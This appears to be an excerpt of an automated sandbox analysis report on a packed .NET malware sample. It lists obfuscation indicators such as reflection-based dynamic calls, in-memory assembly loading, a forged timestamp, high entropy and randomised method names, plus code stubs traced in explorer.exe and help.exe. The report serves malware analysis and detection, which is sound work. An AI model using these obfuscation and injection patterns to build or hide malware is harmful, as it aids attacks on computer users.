                Source: Binary string: help.pdb source: duGqHKp0OUXaX1D.exe, 00000002.00000002.1433271008.0000000001D40000.00000040.10000000.00040000.00000000.sdmp, duGqHKp0OUXaX1D.exe, 00000002.00000002.1431926616.0000000001498000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000004.00000002.3821169791.00000000007C0000.00000040.80000000.00040000.00000000.sdmp
                Source: Binary string: uSpw.pdbSHA256 source: duGqHKp0OUXaX1D.exe

                Data Obfuscation

                barindex
                .NET source code contains method to dynamically call methods (often used by packers)
                Source: 0.2.duGqHKp0OUXaX1D.exe.4f50000.4.raw.unpack, ivtNue3aMakjbVsfus.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                Source: 0.2.duGqHKp0OUXaX1D.exe.26e3fd8.1.raw.unpack, ivtNue3aMakjbVsfus.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                .NET source code contains potential unpacker
                Source: duGqHKp0OUXaX1D.exe, Form1.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
                Source: 0.2.duGqHKp0OUXaX1D.exe.3ad8480.3.raw.unpack, IN0CtjOPkLO1DWAhVX.cs.Net Code: TFAXeB9uP7 System.Reflection.Assembly.Load(byte[])
                Source: 0.2.duGqHKp0OUXaX1D.exe.5b70000.7.raw.unpack, IN0CtjOPkLO1DWAhVX.cs.Net Code: TFAXeB9uP7 System.Reflection.Assembly.Load(byte[])
                Source: 0.2.duGqHKp0OUXaX1D.exe.3a4ca60.2.raw.unpack, IN0CtjOPkLO1DWAhVX.cs.Net Code: TFAXeB9uP7 System.Reflection.Assembly.Load(byte[])
                Source: duGqHKp0OUXaX1D.exeStatic PE information: 0x8E073EEC [Wed Jul 5 03:52:12 2045 UTC]
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_004168EB push ecx; retf 2_2_004168EC
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_00416942 push edi; iretd 2_2_00416949
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_0041646B push ecx; iretd 2_2_00416495
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_0040E46E push ebx; retf 2_2_0040E480
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_00416496 push ecx; iretd 2_2_00416495
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_0041D4B5 push eax; ret 2_2_0041D508
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_0041D56C push eax; ret 2_2_0041D572
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_0041D502 push eax; ret 2_2_0041D508
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_0041D50B push eax; ret 2_2_0041D572
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F09AD push ecx; mov dword ptr [esp], ecx2_2_019F09B6
                Source: C:\Windows\explorer.exeCode function: 3_2_0DE279B5 push esp; retn 0000h3_2_0DE27AE7
                Source: C:\Windows\explorer.exeCode function: 3_2_0DE27B02 push esp; retn 0000h3_2_0DE27B03
                Source: C:\Windows\explorer.exeCode function: 3_2_0DE27B1E push esp; retn 0000h3_2_0DE27B1F
                Source: C:\Windows\explorer.exeCode function: 3_2_0DF129B5 push esp; retn 0000h3_2_0DF12AE7
                Source: C:\Windows\explorer.exeCode function: 3_2_0DF12B1E push esp; retn 0000h3_2_0DF12B1F
                Source: C:\Windows\explorer.exeCode function: 3_2_0DF12B02 push esp; retn 0000h3_2_0DF12B03
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032C225F pushad ; ret 4_2_032C27F9
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032C27FA pushad ; ret 4_2_032C27F9
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032F09AD push ecx; mov dword ptr [esp], ecx4_2_032F09B6
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032C283D push eax; iretd 4_2_032C2858
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_02946496 push ecx; iretd 4_2_02946495
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0293E46E push ebx; retf 4_2_0293E480
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0294646B push ecx; iretd 4_2_02946495
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_029468EB push ecx; retf 4_2_029468EC
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_02946942 push edi; iretd 4_2_02946949
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0294D4B5 push eax; ret 4_2_0294D508
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0294D502 push eax; ret 4_2_0294D508
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0294D50B push eax; ret 4_2_0294D572
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0294D56C push eax; ret 4_2_0294D572
                Source: duGqHKp0OUXaX1D.exeStatic PE information: section name: .text entropy: 7.791946698624655
                Source: 0.2.duGqHKp0OUXaX1D.exe.4f50000.4.raw.unpack, H8RxCCTG2lqB13Rl08.csHigh entropy of concatenated method names: 'BWXySrfaKk', 'O1uyJIJkvJ', 'FYuy29LETE', 'Nr6yB8b3kD', 'tquyCnxVtm', 'xG3y49hv1M', 'aMxypkVXs0', 'zXZyj69DS7', 'VfeyH0y2yr', 'ARhyKeRyuC'
                Source: 0.2.duGqHKp0OUXaX1D.exe.4f50000.4.raw.unpack, ivtNue3aMakjbVsfus.csHigh entropy of concatenated method names: 'hayyrDbcfV', 'RgtTUJcyZL', 'gT8yhPI3jg', 'D4SyXwSaZ8', 'eGDyD0eGyP', 'Q1my3V6pua', 'HJq5kCF3PwuIZ', 'v2v9oltHw', 'V3yxNksFn', 'LmcVIqhFH'
                Source: 0.2.duGqHKp0OUXaX1D.exe.26e3fd8.1.raw.unpack, H8RxCCTG2lqB13Rl08.csHigh entropy of concatenated method names: 'BWXySrfaKk', 'O1uyJIJkvJ', 'FYuy29LETE', 'Nr6yB8b3kD', 'tquyCnxVtm', 'xG3y49hv1M', 'aMxypkVXs0', 'zXZyj69DS7', 'VfeyH0y2yr', 'ARhyKeRyuC'
                Source: 0.2.duGqHKp0OUXaX1D.exe.26e3fd8.1.raw.unpack, ivtNue3aMakjbVsfus.csHigh entropy of concatenated method names: 'hayyrDbcfV', 'RgtTUJcyZL', 'gT8yhPI3jg', 'D4SyXwSaZ8', 'eGDyD0eGyP', 'Q1my3V6pua', 'HJq5kCF3PwuIZ', 'v2v9oltHw', 'V3yxNksFn', 'LmcVIqhFH'
                Source: 0.2.duGqHKp0OUXaX1D.exe.3ad8480.3.raw.unpack, tgPQQSpR0cZ6BJWkVo.csHigh entropy of concatenated method names: 'kjd0QovUdX', 'psR0TASxMv', 'Nd10yCSdbR', 'KIh0Cs6Lq5', 'yoH0aNmXnv', 'EMO0bxS3KW', 'A6C09ckOkj', 'oOc0hFa3cv', 'fel0d0cM1y', 'fuI0Si4oRe'
                Source: 0.2.duGqHKp0OUXaX1D.exe.3ad8480.3.raw.unpack, DcAJfbQ7wU7SQxmjqR.csHigh entropy of concatenated method names: 'AIZGvMIYxc', 'jVFG2G5CLv', 'wjAGIRc7mI', 'CS1Gxhv0tL', 'F3kGmo8IBU', 'kL3GgfmEE4', 'zdyGBn2RrV', 'GrYGE8ldQQ', 'K0hG7Zies6', 'HOxGjLLSDw'
                Source: 0.2.duGqHKp0OUXaX1D.exe.3ad8480.3.raw.unpack, YaUinlTib1G3xUJPOx.csHigh entropy of concatenated method names: 'mduRDbTXyh', 'xyCRMVb4F8', 'vhpRQg2FYT', 'uANRTEO2kV', 'CMaRPJKSoU', 'T6lRZYa8Un', 'gHiRrVhafe', 'CanR5KtgUS', 'N5pRsnu5j7', 'MlqR8d5b3h'
                Source: 0.2.duGqHKp0OUXaX1D.exe.3ad8480.3.raw.unpack, zRAipSun8hgJy3Uheq.csHigh entropy of concatenated method names: 'JUStw0D4ZK', 'LaqtWEKyhp', 'eh7teMM5FZ', 'MogtDgLRmY', 'Gxnt68QyS3', 'Y47tMF3mB1', 'Gg3tkJGD7w', 'M30tQYESaC', 'YabtT4Eqrb', 'z35tckeshI'
                Source: 0.2.duGqHKp0OUXaX1D.exe.3ad8480.3.raw.unpack, qE0oq1XplsihGx4BNY.csHigh entropy of concatenated method names: 'mTQAtcAJfb', 'XwUAO7SQxm', 'iibAL1G3xU', 'mPOAJx2ALV', 'f3CAP0NGLE', 'rblAZEGraN', 'ydKuVd65nUt1UIHvNP', 'OtMocTmDNmT3EB7AnQ', 'W3GAAoMntK', 'VU2Aq019to'
                Source: 0.2.duGqHKp0OUXaX1D.exe.3ad8480.3.raw.unpack, IZbJDGjaUmyBRe2nxy.csHigh entropy of concatenated method names: 'IP1sAZqJ7N', 'Qnasqe730m', 'ikUsXb0Rrl', 'WFssoB0QCe', 'J8qsGts424', 'bAqsVv4KfP', 'lrSsldrYm7', 'l0e5Be8dTD', 'h2R5ESCGv5', 'WrF576pKjp'
                Source: 0.2.duGqHKp0OUXaX1D.exe.3ad8480.3.raw.unpack, KSpKq5GkZ2e2gbjFwb.csHigh entropy of concatenated method names: 'Dispose', 'VKhA7AV4va', 'XD2UClPSZw', 'qQ1NNISnFv', 'NYsAjigysu', 'X6eAzJpHB7', 'ProcessDialogKey', 'hoLUH8uJgY', 'uCdUAHyRif', 'UxgUU4ZbJD'
                Source: 0.2.duGqHKp0OUXaX1D.exe.3ad8480.3.raw.unpack, IN0CtjOPkLO1DWAhVX.csHigh entropy of concatenated method names: 'tpTqiZMW03', 'mAQqoQTBIR', 're6qGv5Xd5', 'ljuqRZ3jQu', 'cxyqVAIwOg', 'BpMqlk6b5s', 'l5Yqt1QeXv', 'tNAqOdupiT', 'DEmqFU5Iv6', 'nMJqLAXKYW'
                Source: 0.2.duGqHKp0OUXaX1D.exe.3ad8480.3.raw.unpack, uoT09kIHHMyfn8k20q.csHigh entropy of concatenated method names: 'ToString', 'NmVZSQXOLQ', 'dMSZCYQEu5', 'gvHZ4m3pqa', 'zmFZaM1yod', 'aOxZbqyhuB', 'tOjZKjWdj8', 'hy8Z9cTDHj', 'sdjZh9yo9d', 'twlZux9fqS'
                Source: 0.2.duGqHKp0OUXaX1D.exe.3ad8480.3.raw.unpack, YXA4VUAH5cVt00ZnJcT.csHigh entropy of concatenated method names: 'GmHswIPyLL', 'phZsWdO70k', 'l2NseTum5C', 'aiHsDnhnuv', 'fQ7s6Myh7D', 'W2esMbM9as', 'vVbskALrDq', 'qyIsQ5kScc', 'DIOsTxptNx', 'OO8scamPBd'
                Source: 0.2.duGqHKp0OUXaX1D.exe.3ad8480.3.raw.unpack, m8uJgY73CdHyRifmxg.csHigh entropy of concatenated method names: 'o6v5yvhL2B', 'LUU5CULTLU', 'HEm54RvnpH', 'Hx35a6tuIj', 'Jvu5vbiTbE', 'Y1s5b4b3A3', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.duGqHKp0OUXaX1D.exe.3ad8480.3.raw.unpack, iJiuUURx6BmonEAn91.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'KorU7TVeQN', 'gnMUjoAgnl', 'lWnUzpOTJp', 'JgdqHNd2VK', 'gBeqAmWDQn', 'RmwqUvlgDM', 'bspqqNIw56', 'ctYXgftxHO69tC0acCW'
                Source: 0.2.duGqHKp0OUXaX1D.exe.3ad8480.3.raw.unpack, vtJBxfzNv9wOY7atj5.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Klks0nQTOT', 'SZKsPAX4Ig', 'EGwsZiWXiH', 'p2usr7Z2pp', 'eqFs5WG83k', 'A4Ess4GYMN', 'gcms8vJWmJ'
                Source: 0.2.duGqHKp0OUXaX1D.exe.3ad8480.3.raw.unpack, AxtYIpAq3ggUPiNYJYF.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'qHF8vaxdBZ', 'UqE82q2T8K', 'z4t8Im2D2F', 'Yoc8xuBGGs', 'QFa8mkSNtM', 'WlO8gyEqac', 'Kl38BGem0a'
                Source: 0.2.duGqHKp0OUXaX1D.exe.3ad8480.3.raw.unpack, tZxNpwUkfdaCGoMB9E.csHigh entropy of concatenated method names: 'yxJehwIAp', 'pr1DBKBLn', 'VhPMtP0HA', 'HQ9kG9rBS', 'ibYTXmnQc', 'wS3cjffDi', 'FGK19HZe9bDfvmvZ3E', 'AQ2NLc7hlyKswQb9CT', 'tYA51LJua', 'Rin8Wsi0Z'
                Source: 0.2.duGqHKp0OUXaX1D.exe.3ad8480.3.raw.unpack, wsigysEuE6eJpHB7Ro.csHigh entropy of concatenated method names: 'OCl5onRdeW', 'mZy5Ggymob', 'OvN5RebW6K', 'PIU5VOa8HK', 'pyJ5lX6AXP', 'QRf5tt16M7', 'fAP5OYJN3a', 'bTC5F6EpSv', 'vni5L7bEiM', 'QlP5J1vMU4'
                Source: 0.2.duGqHKp0OUXaX1D.exe.3ad8480.3.raw.unpack, gLEsblyEGraNajGcH9.csHigh entropy of concatenated method names: 'xWCliTor7n', 'hUplGr8tlj', 'zUdlVJZC5W', 'y7wlttBN4D', 'LcQlOcHX6B', 'KnrVmWuu6a', 'NUyVgeK0Rv', 'kSKVB0e4WG', 'okjVE6tr9r', 'bpZV70xZPo'
                Source: 0.2.duGqHKp0OUXaX1D.exe.3ad8480.3.raw.unpack, fk1UIvgrsuxnreKTRg.csHigh entropy of concatenated method names: 'P7QrEfGeY2', 'IZlrjQpof3', 'cMY5HNrcic', 'eOm5AaMxOj', 'x1MrSW1tPG', 'd0fr1GRNn3', 'NERrp3AfO1', 'KXvrvZtVS2', 'kMEr2ctAGL', 'EWLrIw8l0A'
                Source: 0.2.duGqHKp0OUXaX1D.exe.3ad8480.3.raw.unpack, NEVdnhvnVgEaSNcLx9.csHigh entropy of concatenated method names: 'JmTPdCXLSy', 'tqaP1e5l3X', 'QshPvVZmQB', 'uLwP2EMXaB', 'Kx9PCkgYrt', 'MueP4jho6m', 'dQGPaS3ZQY', 'ERhPbB6V1G', 'QVZPKFxOmd', 'zlpP9ptdsr'
                Source: 0.2.duGqHKp0OUXaX1D.exe.3ad8480.3.raw.unpack, SALVIvcA2ajS2o3C0N.csHigh entropy of concatenated method names: 'B6CV6JQ6GF', 'aG2VkdGsFc', 'ChFR4TDQJ8', 'SIqRaenU53', 'PG8RbU9rOm', 'Fw2RKxvIxr', 'H59R9G8cPp', 'KnHRhPkFlL', 'Ot7RuMCm6r', 'zJhRdXPRks'
                Source: 0.2.duGqHKp0OUXaX1D.exe.5b70000.7.raw.unpack, tgPQQSpR0cZ6BJWkVo.csHigh entropy of concatenated method names: 'kjd0QovUdX', 'psR0TASxMv', 'Nd10yCSdbR', 'KIh0Cs6Lq5', 'yoH0aNmXnv', 'EMO0bxS3KW', 'A6C09ckOkj', 'oOc0hFa3cv', 'fel0d0cM1y', 'fuI0Si4oRe'
                Source: 0.2.duGqHKp0OUXaX1D.exe.5b70000.7.raw.unpack, DcAJfbQ7wU7SQxmjqR.csHigh entropy of concatenated method names: 'AIZGvMIYxc', 'jVFG2G5CLv', 'wjAGIRc7mI', 'CS1Gxhv0tL', 'F3kGmo8IBU', 'kL3GgfmEE4', 'zdyGBn2RrV', 'GrYGE8ldQQ', 'K0hG7Zies6', 'HOxGjLLSDw'
                Source: 0.2.duGqHKp0OUXaX1D.exe.5b70000.7.raw.unpack, YaUinlTib1G3xUJPOx.csHigh entropy of concatenated method names: 'mduRDbTXyh', 'xyCRMVb4F8', 'vhpRQg2FYT', 'uANRTEO2kV', 'CMaRPJKSoU', 'T6lRZYa8Un', 'gHiRrVhafe', 'CanR5KtgUS', 'N5pRsnu5j7', 'MlqR8d5b3h'
                Source: 0.2.duGqHKp0OUXaX1D.exe.5b70000.7.raw.unpack, zRAipSun8hgJy3Uheq.csHigh entropy of concatenated method names: 'JUStw0D4ZK', 'LaqtWEKyhp', 'eh7teMM5FZ', 'MogtDgLRmY', 'Gxnt68QyS3', 'Y47tMF3mB1', 'Gg3tkJGD7w', 'M30tQYESaC', 'YabtT4Eqrb', 'z35tckeshI'
                Source: 0.2.duGqHKp0OUXaX1D.exe.5b70000.7.raw.unpack, qE0oq1XplsihGx4BNY.csHigh entropy of concatenated method names: 'mTQAtcAJfb', 'XwUAO7SQxm', 'iibAL1G3xU', 'mPOAJx2ALV', 'f3CAP0NGLE', 'rblAZEGraN', 'ydKuVd65nUt1UIHvNP', 'OtMocTmDNmT3EB7AnQ', 'W3GAAoMntK', 'VU2Aq019to'
                Source: 0.2.duGqHKp0OUXaX1D.exe.5b70000.7.raw.unpack, IZbJDGjaUmyBRe2nxy.csHigh entropy of concatenated method names: 'IP1sAZqJ7N', 'Qnasqe730m', 'ikUsXb0Rrl', 'WFssoB0QCe', 'J8qsGts424', 'bAqsVv4KfP', 'lrSsldrYm7', 'l0e5Be8dTD', 'h2R5ESCGv5', 'WrF576pKjp'
                Source: 0.2.duGqHKp0OUXaX1D.exe.5b70000.7.raw.unpack, KSpKq5GkZ2e2gbjFwb.csHigh entropy of concatenated method names: 'Dispose', 'VKhA7AV4va', 'XD2UClPSZw', 'qQ1NNISnFv', 'NYsAjigysu', 'X6eAzJpHB7', 'ProcessDialogKey', 'hoLUH8uJgY', 'uCdUAHyRif', 'UxgUU4ZbJD'
                Source: 0.2.duGqHKp0OUXaX1D.exe.5b70000.7.raw.unpack, IN0CtjOPkLO1DWAhVX.csHigh entropy of concatenated method names: 'tpTqiZMW03', 'mAQqoQTBIR', 're6qGv5Xd5', 'ljuqRZ3jQu', 'cxyqVAIwOg', 'BpMqlk6b5s', 'l5Yqt1QeXv', 'tNAqOdupiT', 'DEmqFU5Iv6', 'nMJqLAXKYW'
                Source: 0.2.duGqHKp0OUXaX1D.exe.5b70000.7.raw.unpack, uoT09kIHHMyfn8k20q.csHigh entropy of concatenated method names: 'ToString', 'NmVZSQXOLQ', 'dMSZCYQEu5', 'gvHZ4m3pqa', 'zmFZaM1yod', 'aOxZbqyhuB', 'tOjZKjWdj8', 'hy8Z9cTDHj', 'sdjZh9yo9d', 'twlZux9fqS'
                Source: 0.2.duGqHKp0OUXaX1D.exe.5b70000.7.raw.unpack, YXA4VUAH5cVt00ZnJcT.csHigh entropy of concatenated method names: 'GmHswIPyLL', 'phZsWdO70k', 'l2NseTum5C', 'aiHsDnhnuv', 'fQ7s6Myh7D', 'W2esMbM9as', 'vVbskALrDq', 'qyIsQ5kScc', 'DIOsTxptNx', 'OO8scamPBd'
                Source: 0.2.duGqHKp0OUXaX1D.exe.5b70000.7.raw.unpack, m8uJgY73CdHyRifmxg.csHigh entropy of concatenated method names: 'o6v5yvhL2B', 'LUU5CULTLU', 'HEm54RvnpH', 'Hx35a6tuIj', 'Jvu5vbiTbE', 'Y1s5b4b3A3', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.duGqHKp0OUXaX1D.exe.5b70000.7.raw.unpack, iJiuUURx6BmonEAn91.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'KorU7TVeQN', 'gnMUjoAgnl', 'lWnUzpOTJp', 'JgdqHNd2VK', 'gBeqAmWDQn', 'RmwqUvlgDM', 'bspqqNIw56', 'ctYXgftxHO69tC0acCW'
                Source: 0.2.duGqHKp0OUXaX1D.exe.5b70000.7.raw.unpack, vtJBxfzNv9wOY7atj5.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Klks0nQTOT', 'SZKsPAX4Ig', 'EGwsZiWXiH', 'p2usr7Z2pp', 'eqFs5WG83k', 'A4Ess4GYMN', 'gcms8vJWmJ'
                Source: 0.2.duGqHKp0OUXaX1D.exe.5b70000.7.raw.unpack, AxtYIpAq3ggUPiNYJYF.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'qHF8vaxdBZ', 'UqE82q2T8K', 'z4t8Im2D2F', 'Yoc8xuBGGs', 'QFa8mkSNtM', 'WlO8gyEqac', 'Kl38BGem0a'
                Source: 0.2.duGqHKp0OUXaX1D.exe.5b70000.7.raw.unpack, tZxNpwUkfdaCGoMB9E.csHigh entropy of concatenated method names: 'yxJehwIAp', 'pr1DBKBLn', 'VhPMtP0HA', 'HQ9kG9rBS', 'ibYTXmnQc', 'wS3cjffDi', 'FGK19HZe9bDfvmvZ3E', 'AQ2NLc7hlyKswQb9CT', 'tYA51LJua', 'Rin8Wsi0Z'
                Source: 0.2.duGqHKp0OUXaX1D.exe.5b70000.7.raw.unpack, wsigysEuE6eJpHB7Ro.csHigh entropy of concatenated method names: 'OCl5onRdeW', 'mZy5Ggymob', 'OvN5RebW6K', 'PIU5VOa8HK', 'pyJ5lX6AXP', 'QRf5tt16M7', 'fAP5OYJN3a', 'bTC5F6EpSv', 'vni5L7bEiM', 'QlP5J1vMU4'
                Source: 0.2.duGqHKp0OUXaX1D.exe.5b70000.7.raw.unpack, gLEsblyEGraNajGcH9.csHigh entropy of concatenated method names: 'xWCliTor7n', 'hUplGr8tlj', 'zUdlVJZC5W', 'y7wlttBN4D', 'LcQlOcHX6B', 'KnrVmWuu6a', 'NUyVgeK0Rv', 'kSKVB0e4WG', 'okjVE6tr9r', 'bpZV70xZPo'
                Source: 0.2.duGqHKp0OUXaX1D.exe.5b70000.7.raw.unpack, fk1UIvgrsuxnreKTRg.csHigh entropy of concatenated method names: 'P7QrEfGeY2', 'IZlrjQpof3', 'cMY5HNrcic', 'eOm5AaMxOj', 'x1MrSW1tPG', 'd0fr1GRNn3', 'NERrp3AfO1', 'KXvrvZtVS2', 'kMEr2ctAGL', 'EWLrIw8l0A'
                Source: 0.2.duGqHKp0OUXaX1D.exe.5b70000.7.raw.unpack, NEVdnhvnVgEaSNcLx9.csHigh entropy of concatenated method names: 'JmTPdCXLSy', 'tqaP1e5l3X', 'QshPvVZmQB', 'uLwP2EMXaB', 'Kx9PCkgYrt', 'MueP4jho6m', 'dQGPaS3ZQY', 'ERhPbB6V1G', 'QVZPKFxOmd', 'zlpP9ptdsr'
                Source: 0.2.duGqHKp0OUXaX1D.exe.5b70000.7.raw.unpack, SALVIvcA2ajS2o3C0N.csHigh entropy of concatenated method names: 'B6CV6JQ6GF', 'aG2VkdGsFc', 'ChFR4TDQJ8', 'SIqRaenU53', 'PG8RbU9rOm', 'Fw2RKxvIxr', 'H59R9G8cPp', 'KnHRhPkFlL', 'Ot7RuMCm6r', 'zJhRdXPRks'
                Source: 0.2.duGqHKp0OUXaX1D.exe.3a4ca60.2.raw.unpack, tgPQQSpR0cZ6BJWkVo.csHigh entropy of concatenated method names: 'kjd0QovUdX', 'psR0TASxMv', 'Nd10yCSdbR', 'KIh0Cs6Lq5', 'yoH0aNmXnv', 'EMO0bxS3KW', 'A6C09ckOkj', 'oOc0hFa3cv', 'fel0d0cM1y', 'fuI0Si4oRe'
                Source: 0.2.duGqHKp0OUXaX1D.exe.3a4ca60.2.raw.unpack, DcAJfbQ7wU7SQxmjqR.csHigh entropy of concatenated method names: 'AIZGvMIYxc', 'jVFG2G5CLv', 'wjAGIRc7mI', 'CS1Gxhv0tL', 'F3kGmo8IBU', 'kL3GgfmEE4', 'zdyGBn2RrV', 'GrYGE8ldQQ', 'K0hG7Zies6', 'HOxGjLLSDw'
                Source: 0.2.duGqHKp0OUXaX1D.exe.3a4ca60.2.raw.unpack, YaUinlTib1G3xUJPOx.csHigh entropy of concatenated method names: 'mduRDbTXyh', 'xyCRMVb4F8', 'vhpRQg2FYT', 'uANRTEO2kV', 'CMaRPJKSoU', 'T6lRZYa8Un', 'gHiRrVhafe', 'CanR5KtgUS', 'N5pRsnu5j7', 'MlqR8d5b3h'
                Source: 0.2.duGqHKp0OUXaX1D.exe.3a4ca60.2.raw.unpack, zRAipSun8hgJy3Uheq.csHigh entropy of concatenated method names: 'JUStw0D4ZK', 'LaqtWEKyhp', 'eh7teMM5FZ', 'MogtDgLRmY', 'Gxnt68QyS3', 'Y47tMF3mB1', 'Gg3tkJGD7w', 'M30tQYESaC', 'YabtT4Eqrb', 'z35tckeshI'
                Source: 0.2.duGqHKp0OUXaX1D.exe.3a4ca60.2.raw.unpack, qE0oq1XplsihGx4BNY.csHigh entropy of concatenated method names: 'mTQAtcAJfb', 'XwUAO7SQxm', 'iibAL1G3xU', 'mPOAJx2ALV', 'f3CAP0NGLE', 'rblAZEGraN', 'ydKuVd65nUt1UIHvNP', 'OtMocTmDNmT3EB7AnQ', 'W3GAAoMntK', 'VU2Aq019to'
                Source: 0.2.duGqHKp0OUXaX1D.exe.3a4ca60.2.raw.unpack, IZbJDGjaUmyBRe2nxy.csHigh entropy of concatenated method names: 'IP1sAZqJ7N', 'Qnasqe730m', 'ikUsXb0Rrl', 'WFssoB0QCe', 'J8qsGts424', 'bAqsVv4KfP', 'lrSsldrYm7', 'l0e5Be8dTD', 'h2R5ESCGv5', 'WrF576pKjp'
                Source: 0.2.duGqHKp0OUXaX1D.exe.3a4ca60.2.raw.unpack, KSpKq5GkZ2e2gbjFwb.csHigh entropy of concatenated method names: 'Dispose', 'VKhA7AV4va', 'XD2UClPSZw', 'qQ1NNISnFv', 'NYsAjigysu', 'X6eAzJpHB7', 'ProcessDialogKey', 'hoLUH8uJgY', 'uCdUAHyRif', 'UxgUU4ZbJD'
                Source: 0.2.duGqHKp0OUXaX1D.exe.3a4ca60.2.raw.unpack, IN0CtjOPkLO1DWAhVX.csHigh entropy of concatenated method names: 'tpTqiZMW03', 'mAQqoQTBIR', 're6qGv5Xd5', 'ljuqRZ3jQu', 'cxyqVAIwOg', 'BpMqlk6b5s', 'l5Yqt1QeXv', 'tNAqOdupiT', 'DEmqFU5Iv6', 'nMJqLAXKYW'
                Source: 0.2.duGqHKp0OUXaX1D.exe.3a4ca60.2.raw.unpack, uoT09kIHHMyfn8k20q.csHigh entropy of concatenated method names: 'ToString', 'NmVZSQXOLQ', 'dMSZCYQEu5', 'gvHZ4m3pqa', 'zmFZaM1yod', 'aOxZbqyhuB', 'tOjZKjWdj8', 'hy8Z9cTDHj', 'sdjZh9yo9d', 'twlZux9fqS'
                Source: 0.2.duGqHKp0OUXaX1D.exe.3a4ca60.2.raw.unpack, YXA4VUAH5cVt00ZnJcT.csHigh entropy of concatenated method names: 'GmHswIPyLL', 'phZsWdO70k', 'l2NseTum5C', 'aiHsDnhnuv', 'fQ7s6Myh7D', 'W2esMbM9as', 'vVbskALrDq', 'qyIsQ5kScc', 'DIOsTxptNx', 'OO8scamPBd'
                Source: 0.2.duGqHKp0OUXaX1D.exe.3a4ca60.2.raw.unpack, m8uJgY73CdHyRifmxg.csHigh entropy of concatenated method names: 'o6v5yvhL2B', 'LUU5CULTLU', 'HEm54RvnpH', 'Hx35a6tuIj', 'Jvu5vbiTbE', 'Y1s5b4b3A3', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.duGqHKp0OUXaX1D.exe.3a4ca60.2.raw.unpack, iJiuUURx6BmonEAn91.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'KorU7TVeQN', 'gnMUjoAgnl', 'lWnUzpOTJp', 'JgdqHNd2VK', 'gBeqAmWDQn', 'RmwqUvlgDM', 'bspqqNIw56', 'ctYXgftxHO69tC0acCW'
                Source: 0.2.duGqHKp0OUXaX1D.exe.3a4ca60.2.raw.unpack, vtJBxfzNv9wOY7atj5.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Klks0nQTOT', 'SZKsPAX4Ig', 'EGwsZiWXiH', 'p2usr7Z2pp', 'eqFs5WG83k', 'A4Ess4GYMN', 'gcms8vJWmJ'
                Source: 0.2.duGqHKp0OUXaX1D.exe.3a4ca60.2.raw.unpack, AxtYIpAq3ggUPiNYJYF.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'qHF8vaxdBZ', 'UqE82q2T8K', 'z4t8Im2D2F', 'Yoc8xuBGGs', 'QFa8mkSNtM', 'WlO8gyEqac', 'Kl38BGem0a'
                Source: 0.2.duGqHKp0OUXaX1D.exe.3a4ca60.2.raw.unpack, tZxNpwUkfdaCGoMB9E.csHigh entropy of concatenated method names: 'yxJehwIAp', 'pr1DBKBLn', 'VhPMtP0HA', 'HQ9kG9rBS', 'ibYTXmnQc', 'wS3cjffDi', 'FGK19HZe9bDfvmvZ3E', 'AQ2NLc7hlyKswQb9CT', 'tYA51LJua', 'Rin8Wsi0Z'
                Source: 0.2.duGqHKp0OUXaX1D.exe.3a4ca60.2.raw.unpack, wsigysEuE6eJpHB7Ro.csHigh entropy of concatenated method names: 'OCl5onRdeW', 'mZy5Ggymob', 'OvN5RebW6K', 'PIU5VOa8HK', 'pyJ5lX6AXP', 'QRf5tt16M7', 'fAP5OYJN3a', 'bTC5F6EpSv', 'vni5L7bEiM', 'QlP5J1vMU4'
                Source: 0.2.duGqHKp0OUXaX1D.exe.3a4ca60.2.raw.unpack, gLEsblyEGraNajGcH9.csHigh entropy of concatenated method names: 'xWCliTor7n', 'hUplGr8tlj', 'zUdlVJZC5W', 'y7wlttBN4D', 'LcQlOcHX6B', 'KnrVmWuu6a', 'NUyVgeK0Rv', 'kSKVB0e4WG', 'okjVE6tr9r', 'bpZV70xZPo'
